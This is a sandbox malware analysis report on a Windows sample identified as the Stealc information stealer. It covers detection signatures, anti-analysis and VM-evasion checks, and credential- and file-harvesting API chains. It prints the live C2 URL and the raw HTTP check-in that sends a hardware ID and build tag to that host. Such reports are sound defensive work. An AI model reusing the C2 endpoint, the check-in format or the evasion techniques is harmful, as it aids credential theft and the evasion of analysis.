Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532751
MD5:9c8851494e85a86a1b823868d2ec5b1b
SHA1:dbf8f81d9c9bfb1ae8ad0cd1d5bad9a6d0dd41c5
SHA256:3a69f6d29dee1aec39e1a81e574b7dcebe2e3ee08f2d36117a2bc19d8e279e14
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6500 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9C8851494E85A86A1B823868D2EC5B1B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1735801152.000000000107E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1694461519.0000000004E80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6500JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6500JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.320000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-13T21:40:06.485545+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.320000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0032C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00327240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00327240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00329AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00329AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00329B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00329B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00338EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00338EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_003338B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00334910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00334910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0032DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0032E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0032ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00334570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00334570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0032DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0032BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0032F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00333EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00333EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003216D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAAFCAKKKFBFIDGDBFHHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 32 38 38 36 36 38 38 39 32 37 32 30 32 39 37 34 31 31 31 39 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 2d 2d 0d 0a Data Ascii: ------CAAAFCAKKKFBFIDGDBFHContent-Disposition: form-data; name="hwid"8C28866889272029741119------CAAAFCAKKKFBFIDGDBFHContent-Disposition: form-data; name="build"doma------CAAAFCAKKKFBFIDGDBFH--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00324880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00324880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAAFCAKKKFBFIDGDBFHHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 32 38 38 36 36 38 38 39 32 37 32 30 32 39 37 34 31 31 31 39 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 2d 2d 0d 0a Data Ascii: ------CAAAFCAKKKFBFIDGDBFHContent-Disposition: form-data; name="hwid"8C28866889272029741119------CAAAFCAKKKFBFIDGDBFHContent-Disposition: form-data; name="build"doma------CAAAFCAKKKFBFIDGDBFH--
                Source: file.exe, 00000000.00000002.1735801152.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1735801152.000000000107E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1735801152.00000000010D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1735801152.00000000010C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1735801152.00000000010C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php%:
                Source: file.exe, 00000000.00000002.1735801152.00000000010D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php8a
                Source: file.exe, 00000000.00000002.1735801152.000000000107E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpR
                Source: file.exe, 00000000.00000002.1735801152.00000000010C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpu:
                Source: file.exe, 00000000.00000002.1735801152.00000000010D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/law
                Source: file.exe, 00000000.00000002.1735801152.000000000107E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37W$

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E80330_2_006E8033
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F21210_2_006F2121
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A11FB0_2_006A11FB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006ED9D80_2_006ED9D8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E4A8B0_2_006E4A8B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EDB690_2_005EDB69
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DB3C80_2_006DB3C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006EA3D90_2_006EA3D9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006EF5790_2_006EF579
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005BC5350_2_005BC535
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E15FD0_2_006E15FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E65B90_2_006E65B9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006EB64A0_2_006EB64A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E2FAC0_2_006E2FAC
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 003245C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: mmvujlrd ZLIB complexity 0.9949291087962963
                Source: file.exe, 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1694461519.0000000004E80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00339600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00339600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00333720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00333720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\B7UAUDA7.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1815040 > 1048576
                Source: file.exeStatic PE information: Raw size of mmvujlrd is bigger than: 0x100000 < 0x195000

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.320000.0.unpack :EW;.rsrc :W;.idata :W; :EW;mmvujlrd:EW;youucsdu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;mmvujlrd:EW;youucsdu:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00339860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00339860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c0538 should be: 0x1c26bf
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: mmvujlrd
                Source: file.exeStatic PE information: section name: youucsdu
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B207A push eax; mov dword ptr [esp], esi0_2_007B20DC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00637060 push 4DDBFFD3h; mov dword ptr [esp], edx0_2_00637075
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00637060 push 3A0B95B0h; mov dword ptr [esp], ebp0_2_00637088
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00637060 push edx; mov dword ptr [esp], ebx0_2_006370B2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00637060 push edi; mov dword ptr [esp], 2971E26Dh0_2_006370B6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00637060 push 329AB6F7h; mov dword ptr [esp], eax0_2_006370F7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00637060 push edx; mov dword ptr [esp], 00000000h0_2_00637152
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00637060 push edx; mov dword ptr [esp], 47773F8Ch0_2_0063719B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0033B035 push ecx; ret 0_2_0033B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00681063 push esi; mov dword ptr [esp], edi0_2_0068108D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00681063 push edi; mov dword ptr [esp], ecx0_2_00681097
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00681063 push edi; mov dword ptr [esp], ebp0_2_0068109B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00681063 push eax; mov dword ptr [esp], 3F6AAD01h0_2_0068110B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00681063 push esi; mov dword ptr [esp], ebp0_2_0068115C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B486B push edi; mov dword ptr [esp], esi0_2_007B489D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CA040 push eax; mov dword ptr [esp], edi0_2_005CA04A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CA040 push 4436E718h; mov dword ptr [esp], eax0_2_005CA0DB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CA040 push ebx; mov dword ptr [esp], esp0_2_005CA0E4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CA040 push 349A3A4Ch; mov dword ptr [esp], eax0_2_005CA0F8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A60BF push esi; mov dword ptr [esp], 7FF1584Bh0_2_009A60DF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A60BF push esi; mov dword ptr [esp], ecx0_2_009A6107
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A60BF push edx; mov dword ptr [esp], eax0_2_009A612B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A60BF push 67EC4D53h; mov dword ptr [esp], edx0_2_009A6139
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A60BF push 6EE42145h; mov dword ptr [esp], ecx0_2_009A6150
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00718847 push esi; mov dword ptr [esp], 7E73EDB5h0_2_00718875
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00718847 push edi; mov dword ptr [esp], 77ADE580h0_2_007188BC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CF841 push ecx; mov dword ptr [esp], 7FB4011Bh0_2_007CF862
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CF841 push 3BF652F1h; mov dword ptr [esp], edx0_2_007CFEC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E8033 push 6970C3ADh; mov dword ptr [esp], edi0_2_006E809D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E8033 push edx; mov dword ptr [esp], esi0_2_006E80BE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E8033 push 2790FAC3h; mov dword ptr [esp], eax0_2_006E8187
                Source: file.exeStatic PE information: section name: mmvujlrd entropy: 7.953824912705421

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00339860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00339860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13298
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F6019 second address: 6F6035 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C524B215h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F633E second address: 6F6346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F6346 second address: 6F634A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F6492 second address: 6F64CB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jng 00007FD3C4756156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jmp 00007FD3C475615Ch 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop edx 0x00000015 jmp 00007FD3C4756162h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jnp 00007FD3C475615Eh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F64CB second address: 6F64D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F64D5 second address: 6F64E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FD3C4756156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F675E second address: 6F6789 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD3C524B206h 0x00000008 jng 00007FD3C524B206h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 pop ebx 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD3C524B20Fh 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
